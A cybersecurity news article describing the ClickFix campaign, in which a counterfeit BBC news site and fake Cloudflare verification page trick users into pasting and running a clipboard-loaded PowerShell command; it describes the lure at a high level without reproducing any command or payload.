New ClickFix Attack Employs Counterfeit BBC News Page and Deceptive Cloudflare Verification to Mislead Users

A sophisticated new cyberthreat campaign known as the ClickFix attack has emerged, combining the impersonation of trusted news sources with deceptive security verification prompts. This attack masquerades as legitimate BBC news content while employing fake Cloudflare verification screens to deliver malware. The attack begins when users encounter what appears to be legitimate online advertising or search results. Upon clicking, victims are redirected to a convincing replica of a BBC news website, populated with articles stolen from legitimate sources. Instead of authentic news content, the fake site serves as a delivery mechanism for malicious purposes. After browsing the fabricated news site, users encounter a standard Cloudflare security verification page, which is a pixel-perfect replica of genuine Cloudflare Turnstile challenges. These pages include authentic-looking logos and Ray ID footers that lend an air of legitimacy.

When users attempt to complete the verification, they receive instructions to perform seemingly routine steps. They are prompted to press Windows + R to open the Run dialog, press Ctrl + V to paste a verification command, and press Enter to execute the command. Unbeknownst to them, clicking the verification button has already loaded a malicious PowerShell command into their system’s clipboard. The command they paste and execute is not a legitimate verification tool but rather malicious code designed to download and install various types of malware. The ClickFix technique has experienced explosive growth throughout 2024 and 2025, with ESET’s Threat Report indicating a surge of over 517% in the first half of 2025. This makes ClickFix the second most common attack vector after phishing, accounting for nearly 8% of all blocked attacks. Cybersecurity researchers have identified multiple variants of this attack targeting different platforms and services, with attackers impersonating various trusted entities, including Microsoft and Google Chrome. 

Categories: Cybersecurity Threats, Social Engineering Attacks, Malware Delivery Techniques 

Tags: Cyberthreat, ClickFix, Impersonation, Malware, Cloudflare, Security Verification, Social Engineering, Phishing, Attack Vector, Cybersecurity